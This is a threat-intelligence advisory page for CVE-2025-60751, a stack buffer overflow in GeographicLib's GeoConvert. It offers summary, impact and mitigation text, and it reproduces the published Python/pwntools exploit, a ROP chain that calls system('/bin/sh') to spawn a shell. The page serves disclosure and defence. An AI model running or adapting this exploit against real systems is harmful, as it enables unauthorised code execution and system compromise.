GeographicLib v2.5.1 - stack buffer overflow
GeographicLib version 2. 5. 1 and earlier contains a stack buffer overflow vulnerability. Exploit code has been published demonstrating how to leverage this flaw to execute arbitrary code. The vulnerability was discovered in August 2025 and assigned CVE-2025-60751. The exploit targets the GeoConvert binary and uses a crafted payload to execute a shell. No official patch or remediation information is currently available.
AI Analysis
Technical Summary
GeographicLib versions up to 2.5.1 suffer from a stack buffer overflow vulnerability (CVE-2025-60751). This vulnerability allows an attacker to overwrite the stack, enabling arbitrary code execution. Public exploit code written in Python using the pwntools library demonstrates how to exploit this flaw by sending a crafted payload to the GeoConvert binary. The exploit was tested on Kali Linux 6.12.25-amd64. No patch or official fix information is provided in the available data.
Potential Impact
Successful exploitation of this stack buffer overflow can lead to arbitrary code execution on the affected system. This could allow an attacker to execute commands with the privileges of the vulnerable application, potentially leading to system compromise. There are no known exploits in the wild reported at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider mitigating exposure by restricting access to vulnerable binaries and monitoring for suspicious activity related to GeographicLib usage. Avoid running untrusted inputs through the affected GeoConvert binary.
Indicators of Compromise
- exploit-code: Exploit title: GeographicLib v2.5.1 - stack buffer overflow Date of discovery: 20 August 2025 Exploit Author: Me zer0matt (Rosario Matteo Grammatico) <https://github.com/zer0matt> Vendor homepage: https://github.com/geographiclib/ Software link: https://github.com/geographiclib/geographiclib Affected version: GeographicLib <= v2.5.1 Tested on: Kali Linux 6.12.25-amd64 (Virtual Machine) CVE id: CVE-2025-60751 Github issue: https://github.com/geographiclib/geographiclib/issues/43 Exploit repository: https://github.com/zer0matt/CVE-2025-60751 Blog post: https://zer0matt.github.io/CVE-2025-60751/ from pwn import * # --- INITIAL CONFIG --- binary_path = "./GeoConvert" elf = ELF(binary_path) context.binary = elf context.arch = 'amd64' # --- REPLACE THE ADDRESSES WITH YOUR OWN ONES --- pop_rdi = 0x000055555558BEFD ret_gadget = 0x000055555558A016 system_addr = 0x7ffff7a5d110 binsh_addr = 0x7ffff7bb1ea4 exit_addr = 0x7ffff7a4c340 # --- PAYLOAD --- offset = 136 payload = b"A" * offset payload += p64(ret_gadget) # stack align payload += p64(pop_rdi) # pop rdi; ret payload += p64(binsh_addr) # "/bin/sh" address payload += p64(system_addr) # system("/bin/sh") payload += p64(exit_addr) # exit io = process(binary_path, env={"ASAN_OPTIONS":"detect_stack_use_after_return=1"}) io.sendline(payload) io.interactive()
GeographicLib v2.5.1 - stack buffer overflow
Description
GeographicLib version 2. 5. 1 and earlier contains a stack buffer overflow vulnerability. Exploit code has been published demonstrating how to leverage this flaw to execute arbitrary code. The vulnerability was discovered in August 2025 and assigned CVE-2025-60751. The exploit targets the GeoConvert binary and uses a crafted payload to execute a shell. No official patch or remediation information is currently available.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
GeographicLib versions up to 2.5.1 suffer from a stack buffer overflow vulnerability (CVE-2025-60751). This vulnerability allows an attacker to overwrite the stack, enabling arbitrary code execution. Public exploit code written in Python using the pwntools library demonstrates how to exploit this flaw by sending a crafted payload to the GeoConvert binary. The exploit was tested on Kali Linux 6.12.25-amd64. No patch or official fix information is provided in the available data.
Potential Impact
Successful exploitation of this stack buffer overflow can lead to arbitrary code execution on the affected system. This could allow an attacker to execute commands with the privileges of the vulnerable application, potentially leading to system compromise. There are no known exploits in the wild reported at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider mitigating exposure by restricting access to vulnerable binaries and monitoring for suspicious activity related to GeographicLib usage. Avoid running untrusted inputs through the affected GeoConvert binary.
Technical Details
- Edb Id
- 52522
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for GeographicLib v2.5.1 - stack buffer overflow
Exploit title: GeographicLib v2.5.1 - stack buffer overflow Date of discovery: 20 August 2025 Exploit Author: Me zer0matt (Rosario Matteo Grammatico) <https://github.com/zer0matt> Vendor homepage: https://github.com/geographiclib/ Software link: https://github.com/geographiclib/geographiclib Affected version: GeographicLib <= v2.5.1 Tested on: Kali Linux 6.12.25-amd64 (Virtual Machine) CVE id: CVE-2025-60751 Github issue: https://github.com/geographiclib/geographiclib/issues/43 Exploit repositor... (837 more characters)
Threat ID: 69f1f0fdcbff5d8610047e49
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:52:59 AM
Last updated: 4/30/2026, 4:42:36 AM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.